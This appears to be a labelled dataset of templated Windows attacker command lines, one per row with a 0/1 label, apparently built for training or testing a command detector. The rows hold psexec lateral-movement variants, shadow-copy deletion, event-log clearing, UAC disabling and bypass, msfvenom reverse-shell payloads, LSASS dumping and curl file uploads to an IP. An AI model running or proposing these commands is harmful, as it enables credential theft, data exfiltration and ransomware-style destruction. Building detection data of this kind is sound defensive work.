1	psexec \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}
1	cmd /c "psexec \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
1	powershell -c "psexec \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
1	psexec.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}
1	cmd /c "psexec.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
1	powershell -c "psexec.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
1	psexec \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}
1	cmd /c "psexec \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
1	powershell -c "psexec \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
1	psexec.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}
1	cmd /c "psexec.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
1	powershell -c "psexec.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
1	psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}
1	cmd /c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}"
1	powershell -c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}"
1	psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}
1	cmd /c "psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}"
1	powershell -c "psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}"
1	psexec \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}
1	cmd /c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}"
1	powershell -c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}"
1	psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}
1	cmd /c "psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}"
1	powershell -c "psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}"
1	psexec \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}
1	cmd /c "psexec \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}"
1	powershell -c "psexec \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}"
1	psexec.exe \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}
1	cmd /c "psexec.exe \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}"
1	powershell -c "psexec.exe \\${ip_address} -i -u ${username} -p ${password} -c ${command_to_execute}"
1	psexec \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s
1	cmd /c "psexec \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s"
1	powershell -c "psexec \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s"
1	psexec.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s
1	cmd /c "psexec.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s"
1	powershell -c "psexec.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s"
1	psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s
1	cmd /c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s"
1	powershell -c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s"
1	psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s
1	cmd /c "psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s"
1	powershell -c "psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s"
1	psexec \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d
1	cmd /c "psexec \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d"
1	powershell -c "psexec \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d"
1	psexec.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d
1	cmd /c "psexec.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d"
1	powershell -c "psexec.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -d"
1	psexec \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d
1	cmd /c "psexec \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d"
1	powershell -c "psexec \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d"
1	psexec.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d
1	cmd /c "psexec.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d"
1	powershell -c "psexec.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute} -d"
1	psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d
1	cmd /c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
1	powershell -c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
1	psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d
1	cmd /c "psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
1	powershell -c "psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
1	psexec \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d
1	cmd /c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d"
1	powershell -c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d"
1	psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d
0	cmd /c "wmic.exe /node:${ip_address} shadowcopy call create Volume=C:"
0	vssadmin delete shadows /All /Quiet
0	powershell -c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}"
0	wevtutil cl security
0	powershell -c "7z a -p${password} ${destination_file_path} ${source_file_path}"
0	taskkill.exe /f /im ${process_name} /T
0	cat email.txt | sendmail ${username}@${domain}
0	cmd /c "wevtutil clear-log application"
0	powershell -c "wmic.exe os get Caption,Version"
0	ipconfig /allcompartments
0	cmd /c "del /q /f ${local_file_path}"
0	powershell -c "mstsc /v:${ip_address} /f /multimon"
0	cmd /c "choco install -y rclone"
0	cmd /c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_SZ"
0	powershell -c "wmic.exe os get OSArchitecture"
0	powershell -c "vssadmin Delete Shadows /All"
0	sdelete -s -accepteula ${local_file_path}
0	powershell -c "wevtutil cl system"
0	powershell -c "sdelete -s -q ${local_file_path}"
0	cmd /c "taskkill.exe /F /IM ${process_name}"
0	cmd /c "taskkill /F /im ${process_name} /T"
0	cmd /c "del /q ${local_file_path}"
0	powershell -c "msfvenom -p windows/x64/meterpreter_reverse_http LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	powershell -c "vssadmin.exe delete shadows /All"
0	mstsc.exe /v:${ip_address} /f /admin
0	rmdir /s ${local_file_path}
0	cmd /c "7z a -slt ${destination_file_path} ${source_file_path} -p${password}"
0	vssadmin.exe Delete Shadows /all /Quiet
0	powershell -c "taskkill.exe /F /im ${process_name} /T"
0	powershell -c "del /f /q ${local_file_path}"
0	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
0	taskkill.exe /F /im ${process_name}
0	powershell -c "choco install psexec"
0	7z a -slp ${destination_file_path} ${source_file_path} -p${password}
0	powershell -c "msfvenom -p windows/meterpreter/reverse_dns LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	cmd /c "netstat.exe"
0	powershell -c "taskkill.exe /F /im ${process_name}"
0	wmic os get Caption,Version
0	powershell -c "curl.exe -X POST http://${ip_address}/upload -F files=@${source_file_path}"
0	cmd /c "curl -X POST http://${ip_address}/upload -F files=@${source_file_path}"
0	cmd /c "netstat.exe"
0	powershell -c "curl -X POST -F 'file=@${source_file_path}' http://${ip_address}:${port}/upload"
0	cmd /c "sdelete.exe -s -accepteula ${local_file_path}"
0	rm -rf ${local_file_path} 2> /dev/null
0	cmd /c "Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
0	sdelete -f -q ${local_file_path}
0	choco install -y putty
0	cmd /c "7z.exe a -p ${destination_file_path} ${source_file_path}"
0	7z a -slp -p ${destination_file_path} ${source_file_path}
0	certutil -encode -Unicode -gmt -v -f error.txt encode.txt
0	powershell -c "curl.exe -X POST -F 'file=@${source_file_path}' http://${ip_address}:${port}/upload"
0	hostname.exe
0	echo ${email_content} | mpack -s ${email_subject} ${username}@${domain} -a attachement.txt 2> &1
0	arp.exe -a
0	powershell -c "netstat -r"
0	sdelete -s -accepteula ${local_file_path}
0	powershell -c "taskkill /f /IM ${process_name} /T"
0	cmd /c "Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s"
0	cmd /c "arp -g"
0	cmd /c "mstsc.exe /v:${ip_address} /public"
0	cmd /c "taskkill.exe /im ${process_name}"
0	powershell -c "procdump -accepteula -ma lsass.exe lsassdump.dmp"
0	powershell -c "reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD_LITTLE_ENDIAN /d 0 /f"
0	powershell -c "procdump.exe -ma lsass.exe lsassdump.dmp"
